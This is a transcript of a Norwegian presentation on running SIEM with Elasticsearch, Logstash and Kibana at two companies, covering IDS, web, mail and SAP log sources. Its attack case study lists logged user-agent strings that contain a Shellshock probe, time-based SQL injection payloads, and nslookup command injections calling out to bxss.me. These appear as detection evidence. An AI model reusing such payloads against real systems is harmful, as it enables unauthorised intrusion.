Security Information and Event Management (SIEM) i praksis. Thomas Tinglum, Zedge Roger Skjetlein, Basis Consulting

Like dokumenter
Install av VPN klient

ELK LOGGER ALT HVA NÅ?

Dataporten sikker og enkel deling av data i UH-sektoren

Installasjon av webtjener

Hvordan stå bedre rustet mot et målrettet angrep Watchcom Security Group AS

SonicWALL UTM. Hvorfor man bør oppgradere til siste generasjon SonicWALL brannmur. NSA E-Class serien. NSA serien. TZ serien

Connectra Check Point remote access portal. Av: Sevald O. Lund

Velkommen til Pressis.

NOVUG 3 februar 2009

6107 Operativsystemer og nettverk

RagHon Consulting. Ragnar Hongset Senior Technical Specialist and owner.

License Management Morten A. Steien EDB Business Partner Industri

Bruk av Elasticsearch til søk og klassifisering. Ove Haugland Jakobsen 26 november 2018

6105 Windows Server og datanett

INF329,HØST

Resymé: I denne leksjonen vil vi se på typer brannmurer, konfigurering av brannmurer og IDS

Metoder og verktøy i operativt sikkerhetsarbeid

Installasjonen krever en Windows 2008 server innmeldt i domene.

Elhub - Milepæl 2 Uttrekk av grunndata til DAM

VPN for Norges idrettshøgskole, Windows

Innocent Code Kapittel 1: The Basics Kapittel 2: Passing Data to Subsystems

DIPS Communicator 6.x. Installasjonsveiledning

Deteksjon og forsvar med ELK. Espen Grøndahl IT-sikkerhetssjef UiO

Sikkerhet og tilgangskontroll i RDBMS-er

Spamfree. Security Services Tjenestebeskrivelse. Eier: Sissel Joramo Agent: Atle Rønning Tekniker: Designer:

Bilag 1 Kravspesifikasjon Avtalereferanse: NT Web avspiller

Installasjonen krever en Windows 2003 server innmeldt i domene.

Huldt & Lillevik Ansattportal. - en tilleggsmodul til Huldt & Lillevik Lønn. Teknisk beskrivelse

Compello Invoice Approval

1. Exhange 2013 Admin Center, Management Shell og opprette mailbox

Sikring av kritisk infrastruktur. Torbjørn Remmen CISSP,CISA,ISO27001

Forelesning 4: Kommunikasjonssikkerhet

TTM4175 Hva er kommunikasjonsteknologi?

Webtjenerstatistikk for

Brukerveiledning. Pålogging og bruk av Bra DESKTOP. Braathe Gruppen AS

InfoRed Publisering. - produktbeskrivelse. TalkPool WebServices Postboks Åneby

Om Samba/fildeling. Hans Nordhaug Institutt for informatikk Høgskolen i Molde

Velkommen til Breakfast Club. Gjennomgang av den nye infrastrukturen og hvilke komponenter som inngår i løsningen.

TTM4175 Hva er kommunikasjonsteknologi?

SAS IN A SOA WORLD MARIUS SOMMERSETH TEAM LEAD TECHNICAL ARCHITECTURE

ARCHICAD Installering av BIM-server 19

SuperOffice hurtigstart guide

Kapittel 13 Advanced Hypertext Implementation. Martin Lie Ole Kristian Heggøy

Enterprise Mobility + Security (EM+S)

Bruk av ucmdb til SLM og Change Management EDB Business Partner Industri

TJENESTE-BESKRIVELSE, INNSTALASJONSVEILEDNING. Vcom StatusUpdate v1.0

Ville du kjøpt en TV som viste kun en kanal?

E-post Basis 500MB Hosted Exchange Mailvask Masseutsendelse e-post

.SMP Cloud Edition med SAPUI5.

6105 Windows Server og datanett

Moderne integrasjonsarkitektur for B2C og B2E. Steinar Kolnes, Senior utvikler

Om Samba/fildeling. Hans Nordhaug Institutt for informatikk Høgskolen i Molde

Nye muligheter i arbeidsflyt

Hva betyr tjenesteorientert arkitektur for sikkerhet?

Erlend Oftedal. Risiko og sikkerhet i IKT-systemer, Tekna

Brannmurer. fire wall (noun): A fireproof wall used as a barrier to prevent spread of fire.

Norges Cykleforbund er et særforbund underlagt Norges Idrettsforbund beliggende i Bærum.

GENERELL BRUKERVEILEDNING WEBLINE

Fjernarbeidsløsningen - når du ikke bruker din vanlige Oslo kommune-pc

6107 Operativsystemer og nettverk

Effektiv Systemadministrasjon

Alt-i-ett-dekning for bedriften din

Bilag 3: Kundens tekniske plattform

eprocess Consulting AS Automatiserte dokument tjenester som forenkler hverdagen

P L A N I A 8 S Y S T E M K R A V PLANIA 8 SYSTEM KRAV. Plania 8 Systemkrav.docx av 8

einnsyn PoC: Demo for fjerde Sprint

Tilkobling og Triggere

2011 Cisco and/or its affiliates. All rights reserved. Cisco Public 1

Kommunikasjonsbærere Mobil/GPRS. Toveiskommunikasjon EBL temadager Gardermoen mai 2008 Harald Salhusvik Jenssen gsm.

BIPAC-7402/7402W (Trådløs) ADSL VPN Firewall Router med 3DES Akselerator Hurtigstartguide

Teknisk Tips & Triks PER TORE HOFF

eform Suite Utvidelse for Hybrid fangst for TeleForm

Bedre selvbetjeningsløsninger. Valg av teknologi for brukergrensesnittene Marita Johansen, Odd Reidar Sømme og Halvard Løchen

Løsningsforslag til eksamen 24. november 2015

Trådløse Systemer. Arild Trobe Engineering Manager. Trådløse Systemer for å løse.. dette?

PRADS PASSIVE REAL-TIME ASSET DETECTION SYSTEM. Edward Fjellskål & Kacper Wysocki

<Insert Picture Here> Oracle BPM Suite. Bjarte Drivenes

4.5 Kravspesifikasjon

RACE ROLE ACCESS ENHANCEMENT I STATKRAFT

1. Intro om SharePoint 2013

UKEOPPGAVER 13: KONFIGURASJONSSTYRING

ISY Park Go og nye ISY Park. Endre Lykke, NoIS

SSL DEKRYPTERING PERSONVERN VS SIKKERHET? STURLA GRELLAND

SQL Server guide til e-lector

BIPAC-7500G g ADSL VPN Firewall Router med 3DES Akselerator Hurtigstartguide

Service NOW i Datametrix. Trond.lindman@datametrix.no

Controller Brukerstøttedatabase Ottar Holstad/Cantor 09.

Pen- tes'ng av webservices. Asbjørn Reglund Thorsen Gruppe- og utviklingsleder UIO/FSAT

Automatisering av datasenteret

einnsyn PoC: Demo for tredje sprint

6105 Windows Server og datanett

6105 Windows Server og datanett

Innholdsfortegnelse. 1. Testing Feiltesting av koden Funksjonstesting: Kilder.10

BiPAC 7402G g ADSL VPN Firewall Router. Hurtigstartguide

Sikkerhet i Pindena Påmeldingssystem

ephorte Installasjon av klienter

Lotus Traveler - Manual for installasjon

Bilag 3: Beskrivelse av det som skal driftes

Norsk Internett Brukermanual. Sist oppdatert Side 1/37

Personec Lønn Personec Lønn Pr

Transkript:

Security Information and Event Management (SIEM) i praksis Thomas Tinglum, Zedge Roger Skjetlein, Basis Consulting

Om presentasjonen Fortelle om praktisk bruk av SIEM i to forskjellige miljøer Dette er en teknisk gjennomgang Det er OK å stille spørsmål underveis

To noe ulike scenarios Hosting av spesial-løsninger Kundenes ekstranett også i stor grad webløsninger og portaler +1000 noder..og sap selvfølgelig Infrastruktur for 80M+ brukere verden over. Mobile applikasjoner og web 2200 eventer pr sekund Sender ut over 1PB med data /mnd

Elasticsearch Indekserer data. Nesten real-time søkbare data. ( forsinkelse 1 sec. ) All data er i JSON formatet Skalerer horisontalt Bruker Apache Lucene biblioteket i bunn.

Logstash Log forwarder Normalisere data Sentralisert prosessering av logger Sørger for samsvar i inn-data i elasticsearch Datafelter i forskjellige log format har ulike navn: Web server: Client-IP Brannmur Source IP Fil: ftp_client_ip SAP client: Terminal Logstash src_ip elastic indexer/data

Zedge SIEM arkitektur Firewall pf, iptables suricata IDS Logstash elastic indexer/data Apper Storage local file storage Heka Web

Basis Consulting SIEM arkitektur system logs, syslog receiver lumberjack receiver customer environment logstash sap audit logs read access logs logstash elastic indexer/data elastic master election, fault detection, cluster state, no master block elastic client data merge kibana proxy acl normalising

Ulike datakilder IDS - Intrusion Detection System: Suricata, Snort, Fail2ban Web: Apache, NGINX, IIS FTP: vsftpd, sftp Brannmur: IPtables, packetfilter, Cisco ASA, FortiGate Epost: Qmail, postfix SAP!

IDS Suricata - multitrådet IDS Regler på protokoll HTTP normalizer og parser Overvåkning opp til L7 OSI Output JSON direkte

Web Aksess logger: klient IP, HTTP kall, HTTP status kode, tidspunkt, user agent, størrelse på forespørselen. Error logger: klient IP, HTTP kall, tidspunkt, feilmelding, evt. intern modul Interne forespørsler: klient IP, HTTP kall, tidspunkt

Fil via SSL og SSH Benytter for transaksjoner (EDI) mellom brukere og ulike sap systemer og integrasjoner. Betydelig angrepsvektor dersom ikke ip filtrering kan benyttes Angrepsvektor reduseres med enkle midler som feks fail2ban Distribuerte bruteforce sees relativt enkelt med SIEM Geoip og plassering på kart lar oss obeservere unormale hotspots forsøk på injections...

Operativsystem Eksempel på brukerinnlogging fra brukeren icinga

Mail Sjekk av volum Sjekk av antall mail per kø Teller også antall ikke-leverte mails Kan ta dette lenger ift spamhaus og maskinlære

SAP SAP - Systems, Applications & Products Enkelt forklart: håndterer forretning, penger, HR, varer, logistikk etc. Alt fra enkle økosystemer til store komplekse som innbefatter flere hundre noder Tidskritisk dersom SAP benyttes ifm produksjon Kritiske og sensitive data

SAP Security Audit Log Sikkerhetmessige hendelser * Endringer av kontoer og aksess * Endring av master data * Endringer av auditing * Start og stopp av transaksjoner Visualisert: Klassifisering kvanta Detalj eksakt type

SAP Router Setter opp aksess mellom klient og sap infrastruktur. ACL regulert ift klient, node og applikasjon. Thu Apr 14 13:58:00 2016 DISCONNECT S9668/6049 host 10.220.7.85/3200 (10.220.7.85) Thu Apr 14 13:58:02 2016 CONNECT FROM C9669/- host 195.245.193.62/12801 Thu Apr 14 13:58:02 2016 DISCONNECT C9669/- host 195.245.193.62/12801 (195.245.193.62) Thu Apr 14 13:58:06 2016 DISCONNECT S2417/7755 host 10.220.7.85/3200 (10.220.7.85) Thu Apr 14 13:58:07 2016 CONNECT FROM C2418/- host 195.245.193.62/12802 Thu Apr 14 13:58:07 2016 DISCONNECT C2418/- host 195.245.193.62/12802 (195.245.193.62) Thu Apr 14 13:58:08 2016 DISCONNECT S7385/10105 host 10.220.7.204/3200 (10.220.7.204) Thu Apr 14 13:58:08 2016 CONNECT FROM C7386/- host 146.254.186.145/52033 Thu Apr 14 13:58:08 2016 CONNECT TO S7386/10106 host 10.220.7.84/sapgw91 (cizep) Thu Apr 14 13:58:08 2016 ESTABLISHED S7386/10106

Router cont d Brudd på policy visualisert

Read Access Log Driver er ofte regulatoriske krav og offentlige standarder Full overvåkning av les og aksess av sensitive data TBD

Case - eksternt angrep

Case - eksternt angrep - injection & agentid Top 80 http.http_user_agent.raw,count Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21,"5,739" Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0),32 Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko,11 () { ignored; }; echo Content-Type: text/plain ; echo ; echo "bash_cve_2014_6271_rce Output : $((79+8))",3 $(nslookup dns.ce.\006878.36-5222.36.07911.\1.bxss.me),2 5SsG8aES'; waitfor delay '0:0:6' --,2 EPm5R3qG,2 Nessus,2 \,2 http://hitpa3j5qbuma.bxss.me/,2 &nslookup dns.ce.\006878.36-4524.36.c8989.\1.bxss.me&'\"`0&nslookup dns.ce.\006878.36-4524.36.c8989.\1.bxss.me&`',1-1 OR 2+518-518-1=0+0+0+1,1-1 OR 2+69-69-1=0+0+0+1 --,1-1' OR 2+782-782-1=0+0+0+1 or 'idbyd5gw'=',1 7HMic7MN';select pg_sleep(6); --,1 Mozilla/5.0,1 Nessus/6403,1 XHWoeSMp'));select pg_sleep(9); --,1 http://hitl94mrqkh8m.bxss.me/,1 wlezrv11');select pg_sleep(3); --,1

Case - eksternt angrep

Case - eksternt angrep

Thomas Tinglum, thomas@zedge.net Roger Skjetlein, roger@basis-consulting.com